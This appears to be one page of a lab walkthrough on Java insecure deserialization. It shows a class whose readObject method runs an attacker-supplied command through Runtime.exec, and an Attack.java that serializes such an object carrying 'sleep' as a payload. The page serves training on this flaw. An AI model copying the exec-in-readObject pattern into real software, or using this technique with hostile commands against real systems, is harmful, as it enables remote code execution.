Insecure Deserialization

5/

VulnerableTaskHolder.java

package org.dummy.insecure.framework;
import java.io.*;
import java.time.LocalDateTime;
public class VulnerableTaskHolder implements Serializable {
    private static long serialVersionUID = 2;
    private String taskName;
    private String taskAction;
    private LocalDateTime requestedExecutionTime;

    public VulnerableTaskHolder(String taskName, String taskAction){
        super();
        this.taskName = taskName;
        this.taskAction = taskAction;
        this.requestedExecutionTime = LocalDateTime.now();
    }
    private void readObject( ObjectInputStream stream) throws Exception{
        stream.defaultReadObject();
        Runtime.getRuntime().exec(taskAction);
    }
}

Attack.java:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import org.dummy.insecure.framework.VulnerableTaskHolder;
public class Attack{
    public static void main(String args[]) throws Exception{
        VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dyn","sleep");
        FileOutputStream fos = new FileOutputStream("serial");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(vulnObj);
        os.close();
    }
}

PreviousHTML tampering NextVulnerable Components

Last updated 3 years ago